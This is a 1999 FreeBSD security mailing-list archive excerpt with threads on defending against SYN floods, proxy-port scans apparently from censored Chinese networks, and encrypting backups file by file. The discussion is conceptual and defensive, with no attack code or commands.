Precedence: bulk X-Loop: FreeBSD.org At 10:50 PM 5/14/99 +0200, Harold Gutch wrote: >On Fri, May 14, 1999 at 02:05:51PM -0600, Brett Glass wrote: > > Any technique that requires the originator to receive your > > SYN-ACK and generate a specific response before you commit > > resources is acceptable. Heck, you don't even really need > > a cryptographically strong hash for this. Is Linux really > > doing one MD5 per SYN? If so, I can think of a few other > > techniques that would give us a speed advantage. We'd be > > able to beat them in the benchmarks while still providing > > good protection against SYN flooding. > > >Ah, that's a very good point, I never thought of the >speed-question. Actually, it turns out that the Linux approach requires a minimum of two MD5's -- one at the time of the SYN and again when the SYNner responds to the SYN-ACK. I think there are a total of three in their algorithm. This gives us a chance to gain a LOT of speed if we can avoid doing all those MD5s. >But you are right - back to the original topic. I checked my >2.2.8 boxes and flooded them with 1 Million SYN packets taking >about 1 minute, so that's (roughly) 16000 SYNs per second. I did >not manage to kill them with this. It may also depend on the complexity of your routing tables. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 15:13:22 1999 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id 9B13C154A7 for ; Fri, 14 May 1999 15:12:14 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id AAA22668; Sat, 15 May 1999 00:10:18 +0200 (CEST) Message-ID: <19990515001018.A22645@foobar.franken.de> Date: Sat, 15 May 1999 00:10:18 +0200 From: Harold Gutch To: Brett Glass , Matthew Dillon Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD References: <199905140438.VAA97604@apollo.backplane.com> <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com> <19990514072546.A20779@foobar.franken.de> <4.2.0.37.19990514133829.0461e220@localhost> <19990514225001.A22317@foobar.franken.de> <4.2.0.37.19990514154319.04610b80@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <4.2.0.37.19990514154319.04610b80@localhost>; from Brett Glass on Fri, May 14, 1999 at 03:46:19PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 14, 1999 at 03:46:19PM -0600, Brett Glass wrote: > At 10:50 PM 5/14/99 +0200, Harold Gutch wrote: > >On Fri, May 14, 1999 at 02:05:51PM -0600, Brett Glass wrote: > > > Any technique that requires the originator to receive your > > > SYN-ACK and generate a specific response before you commit > > > resources is acceptable. Heck, you don't even really need > > > a cryptographically strong hash for this. Is Linux really > > > doing one MD5 per SYN? If so, I can think of a few other > > > techniques that would give us a speed advantage. We'd be > > > able to beat them in the benchmarks while still providing > > > good protection against SYN flooding. > > > > >Ah, that's a very good point, I never thought of the > >speed-question. > > Actually, it turns out that the Linux approach requires > a minimum of two MD5's -- one at the time of the SYN > and again when the SYNner responds to the SYN-ACK. I > think there are a total of three in their algorithm. > This gives us a chance to gain a LOT of speed if we > can avoid doing all those MD5s. > Why should we do anything at all ? Our current tactic (simply dropping sockets in SYN_RCVD state) if a certain backlog fills up and another SYN comes in seems to work quite well. You'll get in trouble though if the flooder manages to flush through the complete backlog in a timeframe shorter than the 2nd and the 3rd packet of the handshake take for the way back to the client and back to the server again. Perhaps dropping a random socket is a better approach... > >But you are right - back to the original topic. I checked my > >2.2.8 boxes and flooded them with 1 Million SYN packets taking > >about 1 minute, so that's (roughly) 16000 SYNs per second. I did > >not manage to kill them with this. > > It may also depend on the complexity of your routing tables. > 1 loopback-route, 2 host routes, 2 network routes and a default-route. Not much, but I could add a number of bogus routes and try to crash the box then by SYN-flooding it. How many routes should I add ? bye, Harold -- Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 14 15:15:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from lariat.lariat.org (lariat.lariat.org [206.100.185.2]) by hub.freebsd.org (Postfix) with ESMTP id 828C91531E for ; Fri, 14 May 1999 15:15:38 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.lariat.org [206.100.185.2]) by lariat.lariat.org (8.9.3/8.9.3) with ESMTP id QAA29117; Fri, 14 May 1999 16:14:55 -0600 (MDT) Message-Id: <4.2.0.37.19990514161228.046541f0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta) Date: Fri, 14 May 1999 16:14:48 -0600 To: Harold Gutch , Matthew Dillon From: Brett Glass Subject: Re: Forwarded from BUGTRAQ: SYN floods against FreeBSD Cc: Jared Mauch , Thamer Al-Herbish , security@FreeBSD.ORG In-Reply-To: <19990515001018.A22645@foobar.franken.de> References: <4.2.0.37.19990514154319.04610b80@localhost> <199905140438.VAA97604@apollo.backplane.com> <4.2.0.37.19990513161529.00c1e3f0@localhost> <4.2.0.37.19990513202450.0444fca0@localhost> <199905140438.VAA97604@apollo.backplane.com> <19990514072546.A20779@foobar.franken.de> <4.2.0.37.19990514133829.0461e220@localhost> <19990514225001.A22317@foobar.franken.de> <4.2.0.37.19990514154319.04610b80@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:10 AM 5/15/99 +0200, Harold Gutch wrote: >Why should we do anything at all ? Our current tactic (simply >dropping sockets in SYN_RCVD state) if a certain backlog fills up >and another SYN comes in seems to work quite well. You'll get in >trouble though if the flooder manages to flush through the >complete backlog in a timeframe shorter than the 2nd and the 3rd >packet of the handshake take for the way back to the client and >back to the server again. You can still mount an effective DoS with a SYN flood by killing a LARGE percentage of the new connections to the box. > It may also depend on the complexity of your routing tables. > > >1 loopback-route, 2 host routes, 2 network routes and a >default-route. Not much, but I could add a number of bogus routes >and try to crash the box then by SYN-flooding it. > >How many routes should I add ? I'm not sure. It also may depend on whether the table is in flux. See the original BUGTRAQ message which points out the bug. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 15 13:42: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from spinner.netplex.com.au (spinner.netplex.com.au [202.12.86.3]) by hub.freebsd.org (Postfix) with ESMTP id 0418A14BD7 for ; Sat, 15 May 1999 13:41:59 -0700 (PDT) (envelope-from peter@netplex.com.au) Received: from netplex.com.au (localhost [127.0.0.1]) by spinner.netplex.com.au (Postfix) with ESMTP id C390F1F58; Sun, 16 May 1999 04:41:56 +0800 (WST) (envelope-from peter@netplex.com.au) X-Mailer: exmh version 2.0.2 2/24/98 To: Kris Kennaway Cc: Matthew Dillon , danny , freebsd-security@freebsd.org Subject: Re: network scan? In-reply-to: Your message of "Thu, 13 May 1999 12:18:16 +0930." Date: Sun, 16 May 1999 04:41:56 +0800 From: Peter Wemm Message-Id: <19990515204158.C390F1F58@spinner.netplex.com.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway wrote: > On Wed, 12 May 1999, Matthew Dillon wrote: > > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 > > :a.b.c.1:1080 in via ed0 > > :... > > > > I get this all the time from people scanning for netbios. I > > usually just ignore them. If I'm in a bad mood I send a nasty gram > > to the originating network. > > In this case they're looking for an open SOCKS proxy (so they can use it to > bounce attacks against other machines, most likely). I usually do what Matt > does as well - if they're scanning really heavily then I might slap a blanket > ban on their IP address(es). Don't forget though that TCP connection > initiations (i.e. the initial step of the 3-way handshake) can be forged if > they're designed to just bounce off your firewall (i.e. not actually connect > to anything which may be listening) - so watch out for cutting off > connectivity to a legitimate client. In this particular case, it's a site in China. They have a heavily censored internet gateway, and I see lots of probes from china (and other areas in Asia that have enforced proxy use and heavily censored feeds) looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other proxies including netscape). They are scanning for relays to bounce connections off to bypass the censored feed. A few key points from traceroute: 16 cust-gw.Teleglobe.net (207.45.214.210) 500.028 ms .. 20 beijing-xgw-lan.cernet.net (202.112.1.210) 1042.496 ms 1042.076 ms 24 guangzhou-rgw-lan.cernet.net (202.112.1.78) 1554.514 ms 1562.112 ms They are not being malicious, just desperate. Most (but not all) cases that I've seen from china are looking for news (journalistic, not usenet) sites in their initial scans. Sigh, the shape of things to come for *.au too perhaps.. :-( Cheers, -Peter To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 15 17:10:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id ABDDE15038 for ; Sat, 15 May 1999 17:10:11 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com ([204.68.178.224]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id SAA06989; Sat, 15 May 1999 18:09:24 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <373E0CB2.D98C9E75@softweyr.com> Date: Sat, 15 May 1999 18:09:22 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Peter Wemm Cc: Kris Kennaway , Matthew Dillon , danny , freebsd-security@FreeBSD.ORG Subject: Re: network scan? References: <19990515204158.C390F1F58@spinner.netplex.com.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Wemm wrote: > > Kris Kennaway wrote: > > On Wed, 12 May 1999, Matthew Dillon wrote: > > > > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 > > > :a.b.c.1:1080 in via ed0 > > > :... > > > > > > I get this all the time from people scanning for netbios. I > > > usually just ignore them. If I'm in a bad mood I send a nasty gram > > > to the originating network. > > > > In this case they're looking for an open SOCKS proxy (so they can use it to > > bounce attacks against other machines, most likely). I usually do what Matt > > does as well - if they're scanning really heavily then I might slap a blanket > > ban on their IP address(es). Don't forget though that TCP connection > > initiations (i.e. the initial step of the 3-way handshake) can be forged if > > they're designed to just bounce off your firewall (i.e. not actually connect > > to anything which may be listening) - so watch out for cutting off > > connectivity to a legitimate client. > > In this particular case, it's a site in China. They have a heavily > censored internet gateway, and I see lots of probes from china (and other > areas in Asia that have enforced proxy use and heavily censored feeds) > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other > proxies including netscape). They are scanning for relays to bounce > connections off to bypass the censored feed. This sounds like an opportunity for someone with a FreeBSD machine and good network connectivity to make themselves a hero. I imagine you'll have to be agile about network addresses if the censors are any good at all. > They are not being malicious, just desperate. Most (but not all) cases > that I've seen from china are looking for news (journalistic, not usenet) > sites in their initial scans. An anonymous gateway service to sites like cnn.com and abcnews.com might go a long way to helping some of these people. I don't have the connectivity (yet), but I may have soon; TCI will finally get digital cable to me day after tomorrow, and @Home shouldn't be too far away. Can anyone else throw up a "public proxy" on a standalone machine? > Sigh, the shape of things to come for *.au too perhaps.. :-( And to think my Australian friends criticize me for saying the US Constitution was divinely inspired. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 15 19:27:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from foobar.franken.de (foobar.franken.de [194.94.249.81]) by hub.freebsd.org (Postfix) with ESMTP id ECB6714D1E for ; Sat, 15 May 1999 19:27:47 -0700 (PDT) (envelope-from logix@foobar.franken.de) Received: (from logix@localhost) by foobar.franken.de (8.8.8/8.8.5) id EAA28542; Sun, 16 May 1999 04:26:58 +0200 (CEST) Message-ID: <19990516042657.A28280@foobar.franken.de> Date: Sun, 16 May 1999 04:26:57 +0200 From: Harold Gutch To: Peter Wemm , Kris Kennaway Cc: Matthew Dillon , danny , freebsd-security@FreeBSD.ORG Subject: Re: network scan? References: <19990515204158.C390F1F58@spinner.netplex.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: <19990515204158.C390F1F58@spinner.netplex.com.au>; from Peter Wemm on Sun, May 16, 1999 at 04:41:56AM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, May 16, 1999 at 04:41:56AM +0800, Peter Wemm wrote: > Kris Kennaway wrote: > > On Wed, 12 May 1999, Matthew Dillon wrote: > > > > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 > > > :a.b.c.1:1080 in via ed0 > > > :... > > > > > > I get this all the time from people scanning for netbios. I > > > usually just ignore them. If I'm in a bad mood I send a nasty gram > > > to the originating network. > > > > In this case they're looking for an open SOCKS proxy (so they can use it to > > In this particular case, it's a site in China. They have a heavily > censored internet gateway, and I see lots of probes from china (and other > areas in Asia that have enforced proxy use and heavily censored feeds) > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other > proxies including netscape). They are scanning for relays to bounce > connections off to bypass the censored feed. > Just to make sure I'm getting this right - you're saying China has a censored internet gateway (i.e. blocking *something* [what exactly ?] ), but they do allow connections to ports 1080, 3128 and 8080 ? bye, Harold -- Sleep is an abstinence syndrome wich occurs due to lack of caffein. Wed Mar 4 04:53:33 CET 1998 #unix, ircnet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 15 21:18:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 7C51114CC5 for ; Sat, 15 May 1999 21:18:15 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com ([204.68.178.224]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id WAA07273; Sat, 15 May 1999 22:18:07 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <373E46FD.72E41F3F@softweyr.com> Date: Sat, 15 May 1999 22:18:05 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Harold Gutch Cc: freebsd-security@FreeBSD.ORG Subject: Re: network scan? References: <19990515204158.C390F1F58@spinner.netplex.com.au> <19990516042657.A28280@foobar.franken.de> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Harold Gutch wrote: > > On Sun, May 16, 1999 at 04:41:56AM +0800, Peter Wemm wrote: > > Kris Kennaway wrote: > > > On Wed, 12 May 1999, Matthew Dillon wrote: > > > > > > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 > > > > :a.b.c.1:1080 in via ed0 > > > > :... > > > > > > > > I get this all the time from people scanning for netbios. I > > > > usually just ignore them. If I'm in a bad mood I send a nasty gram > > > > to the originating network. > > > > > > In this case they're looking for an open SOCKS proxy (so they can use it to > > > > In this particular case, it's a site in China. They have a heavily > > censored internet gateway, and I see lots of probes from china (and other > > areas in Asia that have enforced proxy use and heavily censored feeds) > > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other > > proxies including netscape). They are scanning for relays to bounce > > connections off to bypass the censored feed. > > > Just to make sure I'm getting this right - you're saying China > has a censored internet gateway (i.e. blocking *something* [what > exactly ?] ), but they do allow connections to ports 1080, 3128 > and 8080 ? They block access to sites, not to ports. In particular, sites that carry capitalist misinformation, or what we in the free world call "news." -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 3:14:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from haldjas.folklore.ee (Haldjas.folklore.ee [193.40.6.121]) by hub.freebsd.org (Postfix) with ESMTP id 6B8CC14D6C for ; Sun, 16 May 1999 03:14:52 -0700 (PDT) (envelope-from narvi@haldjas.folklore.ee) Received: from haldjas.folklore.ee (haldjas.folklore.ee [172.17.2.1] (may be forged)) by haldjas.folklore.ee (8.8.8/8.8.4) with SMTP id NAA20768; Sun, 16 May 1999 13:13:07 +0300 (EEST) Date: Sun, 16 May 1999 13:13:06 +0300 (EEST) From: Narvi To: Harold Gutch Cc: Peter Wemm , Kris Kennaway , Matthew Dillon , danny , freebsd-security@FreeBSD.ORG Subject: Re: network scan? In-Reply-To: <19990516042657.A28280@foobar.franken.de> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 16 May 1999, Harold Gutch wrote: > On Sun, May 16, 1999 at 04:41:56AM +0800, Peter Wemm wrote: > > Kris Kennaway wrote: > > > On Wed, 12 May 1999, Matthew Dillon wrote: > > > > > > > :May 12 18:42:24 server /kernel: ipfw: 26000 Deny TCP 202.38.248.205:4359 > > > > :a.b.c.1:1080 in via ed0 > > > > :... > > > > > > > > I get this all the time from people scanning for netbios. I > > > > usually just ignore them. If I'm in a bad mood I send a nasty gram > > > > to the originating network. > > > > > > In this case they're looking for an open SOCKS proxy (so they can use it to > > > > In this particular case, it's a site in China. They have a heavily > > censored internet gateway, and I see lots of probes from china (and other > > areas in Asia that have enforced proxy use and heavily censored feeds) > > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other > > proxies including netscape). They are scanning for relays to bounce > > connections off to bypass the censored feed. > > > Just to make sure I'm getting this right - you're saying China > has a censored internet gateway (i.e. blocking *something* [what > exactly ?] ), but they do allow connections to ports 1080, 3128 > and 8080 ? > Where's the hard part? They censor "web traffic" (you know, that big bad evil thing). That teher may be other "not so straightforward" ways to get the same thing, is something else entirely. > bye, > Harold > > -- > Sleep is an abstinence syndrome wich occurs due to lack of caffein. > Wed Mar 4 04:53:33 CET 1998 #unix, ircnet > Sander There is no love, no good, no happiness and no future - all these are just illusions. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 5:57:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from aniwa.sky (p6-max12.wlg.ihug.co.nz [216.100.145.6]) by hub.freebsd.org (Postfix) with ESMTP id E5556152F3 for ; Sun, 16 May 1999 05:57:08 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id AAA02632; Mon, 17 May 1999 00:55:26 +1200 (NZST) Message-Id: <199905161255.AAA02632@aniwa.sky> X-Mailer: exmh version 2.0.2 2/24/98 To: Wes Peters Cc: Harold Gutch , freebsd-security@FreeBSD.ORG Subject: Re: network scan? (no FreeBSD content) In-reply-to: Your message of "Sat, 15 May 1999 22:18:05 CST." <373E46FD.72E41F3F@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 17 May 1999 00:55:26 +1200 From: Andrew McNaughton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > In this particular case, it's a site in China. They have a heavily > > > censored internet gateway, and I see lots of probes from china (and other > > > areas in Asia that have enforced proxy use and heavily censored feeds) > > > looking for *:1080 (socks), *:3128 (squid) and *:8080 (squid and/or other > > > proxies including netscape). They are scanning for relays to bounce > > > connections off to bypass the censored feed. > > > > > Just to make sure I'm getting this right - you're saying China > > has a censored internet gateway (i.e. blocking *something* [what > > exactly ?] ), but they do allow connections to ports 1080, 3128 > > and 8080 ? > > They block access to sites, not to ports. In particular, sites that > carry capitalist misinformation, or what we in the free world call > "news." As someone in the business of running a political news website, I find most of it fits the description of 'capitalist misinformation' rather well. The difference if there is one is that dissenting voices exist as well, and are not punished, though their material is greatly outnumbered. The rich pay for lots of highly skilled people to say what the rich want people to hear. The idea that news is written by journalists is mostly a myth. Journalists mostly reprocess news from press releases written by Public Relations firms, spin doctors and pressure groups. What they do write is tempered by the need to keep on the right side of the people who provide the bulk of the news they sell. Blocking access by site seems like it would mean that accessible information would come mostly from the masses of smaller sites, and probably be much more balanced overall. The strength of the net has always been in its broad base, and not in a few big sites (possibly excepting the search engines). Andrew McNaughton PS. A bit off topic really. Sorry. -- ----------- Andrew McNaughton andrew@squiz.co.nz http://www.newsroom.co.nz/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 10:16:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from puffer.quadrunner.com (puffer.quadrunner.com [205.166.195.4]) by hub.freebsd.org (Postfix) with ESMTP id D057D1510C for ; Sun, 16 May 1999 10:16:18 -0700 (PDT) (envelope-from humble@lightning.net) Received: from localhost (humble@localhost) by puffer.quadrunner.com (8.9.2/QUAD-2.1) with ESMTP id KAA18136 for ; Sun, 16 May 1999 10:16:17 -0700 (PDT) X-Authentication-Warning: puffer.quadrunner.com: humble owned process doing -bs Date: Sun, 16 May 1999 10:16:17 -0700 (PDT) From: Richard Steenbergen X-Sender: humble@puffer.quadrunner.com To: security@freebsd.org Subject: Re: SYN floods against FreeBSD (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I think this patch is a bad idea. > > I recall fixing a bug in the route table code that could cause a > double-free panic, but I do not remember if it was before or after > the 3.1 release. In anycase, a double-free panic has nothing to do > with a high volume of SYN traffic apart from ticking some new bug. > The appropriate fix is *not* to try to limit the sync traffic but > instead to track down, locate, and fix the double-free. > > I will go over the route table code to see if the softclock interrupt > is being properly masked while the route table is being manipulated. The SYN rate limit patch was not intended to address the double free problem or the backlogging of incoming incomplete handshakes. It was done for one purpose and one purpose only, CPU. When you are being hit with 100kpps (which is not terribly unheard of against EFNet IRC servers), all the queueing in the world isn't going to help (imagine trying to do MD5 hashing like this?). At a certain point, the goal shifts from "how do we keep this service alive for new connections" to "how to we keep the existing connections alive". Prior to this the only effective defense against such high bandwidth attacks was Committed Access Rates on the router, which has been cost & cpu prohibitive for a number of people. The fact that not processing syns past a certain amount keeps the machine from panicing is simply a nice side effect until the true cause of the problem can be fixed. What I would like to see done with all this rate limiting stuff (icmp_bandlim also) is an interface similar to cisco's CAR, through ipfw, with the ability to limit any protocol, with any set of matching rules, via any interface, with the ability to specify actions for conform/exceed behaviors, and the ability to burst higher for small amounts of time. Probably a pipe dream. =) -- Richard Steenbergen humble@EFNet PGP ID: 0x741D0374 PGP Key Fingerprint: C6EF EFA0 83B2 071F 1AB6 B879 1F70 4303 741D 0374 http://users.quadrunner.com/humble To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 17:18:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.ihug.co.nz (tk1.ihug.co.nz [203.29.160.13]) by hub.freebsd.org (Postfix) with ESMTP id 90A7514C25 for ; Sun, 16 May 1999 17:17:58 -0700 (PDT) (envelope-from nr1@ihug.co.nz) Received: from foo (p8-max12.wlg.ihug.co.nz [216.100.145.8]) by smtp1.ihug.co.nz (8.8.8/8.8.8) with SMTP id MAA18766 for freebsd-security@freebsd.org; Mon, 17 May 1999 12:14:19 +1200 Date: Mon, 17 May 1999 12:14:19 +1200 From: nr1@ihug.co.nz Message-Id: <199905170014.MAA18766@smtp1.ihug.co.nz> To: freebsd-security@freebsd.org Fcc: +sent_mail Subject: secure backup Mime-Version: 1.0 Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can anyone recommend how I should go about creating a backup to an untrusted machine that has the tape drive, and using an untrusted network. I'm a bit wary of encrypting the output of tar or dump, as a single byte error would make the rest of the backup useless. I'd like to encrypt (pgp?) each file separately as I go, so that a corrupted byte affects only one file on retrieval. Is there an existing way to do this, or should I hack tar or dump into doing it? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 17:46:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from inet.chip-web.com (c1003518-a.plstn1.sfba.home.com [24.1.82.47]) by hub.freebsd.org (Postfix) with SMTP id B78ED14BED for ; Sun, 16 May 1999 17:46:39 -0700 (PDT) (envelope-from ludwigp@toy.chip-web.com) Received: (qmail 11569 invoked from network); 17 May 1999 00:46:38 -0000 Received: from speedy.chip-web.com (HELO speedy) (172.16.1.1) by inet.chip-web.com with SMTP; 17 May 1999 00:46:38 -0000 Message-Id: <4.1.19990516173306.00a7fa20@mail-r> X-Sender: ludwigp@toy.chip-web.com (Unverified) X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Sun, 16 May 1999 17:46:52 -0700 To: Wes Peters From: Ludwig Pummer Subject: warning concerning a public proxy [was Re: network scan?] Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <373E0CB2.D98C9E75@softweyr.com> References: <19990515204158.C390F1F58@spinner.netplex.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:09 PM 5/15/1999 , Wes Peters wrote: >An anonymous gateway service to sites like cnn.com and abcnews.com >might go a long way to helping some of these people. I don't have >the connectivity (yet), but I may have soon; TCI will finally get >digital cable to me day after tomorrow, and @Home shouldn't be too >far away. > >Can anyone else throw up a "public proxy" on a standalone machine? Applause for your noble intentions, but the @Home AUP ( www.home.net/aup/ ) prohibits running services for other people (and in some cases, for yourself). Web server, email servers, FTP servers, and IP tunneling are expressly prohibited. I'm not saying it's impossible to run a server off @Home. It's just that if you do, you have to be careful not to attract too much attention. If your public proxy is suddenly eating up all of your neighborhood's bandwidth (and it will eat it up because upload bandwidth is considerably lower than download, and once word of a public proxy like yours gets out, it will be used heavily), @Home will be sure to notice. Setting up a public proxy might feel real good, but it won't any more after @Home cancels your account. --Ludwig Pummer ( ludwigp@bigfoot.com ) ICQ UIN: 692441 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 17:55:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from tasam.com (tasam.com [206.161.83.22]) by hub.freebsd.org (Postfix) with ESMTP id DCF7114BED for ; Sun, 16 May 1999 17:55:16 -0700 (PDT) (envelope-from freebsd.list@bug.tasam.com) Received: from bug (bug.tasam.com [206.161.113.114]) by tasam.com (8.9.3/8.9.1) with SMTP id UAA11517; Sun, 16 May 1999 20:55:04 -0400 (EDT) Message-ID: <006b01be9fff$ee9176e0$7271a1ce@tasam.com> From: "Joe Gleason" To: , References: <199905170014.MAA18766@smtp1.ihug.co.nz> Subject: Re: secure backup Date: Sun, 16 May 1999 20:55:08 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I backup my workstation via piping a tar output through pgp. I never throught about the data error possiblity. It would be inclined to let tcp handle it. If that doesn't meet your needs, you could setup something completely insane with shell scripting. (My answer to every problem). The script could do something like this, on the machine with the files to backup (I'll call it A) it will run a find, and do a for loop on the output of that find. For each of these files, it will pgp the file and send it to B (system receiving backup) The sending can go something like this, A connects to B on port x and sends the filename that it is about to send. Then A connects to B on port y and sends the data. B saves the file that is receives on y as the name is was given on x and then adds this file to a tarball. This connection from A to B can be done via faucet and hose. This way, the final product will be a tarball on B that has each file encrypted and separate. There would be alot of security issues in making sure that A cannot be spoofed to send odd things to B to compromise it via ports x and y, but that could be handled with setting the remote host in faucet, maybe ipfw and general sanity checks on anything comming into B. My ramblings for the day. Joe Gleason Tasam ----- Original Message ----- From: To: Sent: Sunday, May 16, 1999 20:14 Subject: secure backup > Can anyone recommend how I should go about creating a backup to an untrusted > machine that has the tape drive, and using an untrusted network. > > I'm a bit wary of encrypting the output of tar or dump, as a single byte error > would make the rest of the backup useless. I'd like to encrypt (pgp?) each > file separately as I go, so that a corrupted byte affects only one file on > retrieval. Is there an existing way to do this, or should I hack tar or dump > into doing it? > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 16 17:57: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from mojo.calyx.net (mojo.calyx.net [208.132.136.2]) by hub.freebsd.org (Postfix) with SMTP id CF33214BED for ; Sun, 16 May 1999 17:56:58 -0700 (PDT) (envelope-from lists@mojo.calyx.net) Received: (qmail 